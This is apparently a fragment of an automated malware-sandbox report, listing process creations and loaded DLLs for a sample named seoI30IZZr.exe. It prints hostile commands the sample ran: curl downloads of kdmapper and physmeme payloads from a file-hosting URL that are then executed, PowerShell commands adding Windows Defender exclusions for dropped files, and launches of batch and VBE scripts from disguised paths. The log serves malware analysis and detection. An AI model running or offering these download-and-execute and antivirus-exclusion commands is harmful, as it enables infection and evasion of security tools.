                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: unknownProcess created: C:\Edge\msedge.exe C:\Edge\msedge.exe
                                Source: unknownProcess created: C:\Edge\msedge.exe C:\Edge\msedge.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xPfNd2AH1w.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Jcydu7dUmM.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: d3d9.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: msvcp140.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
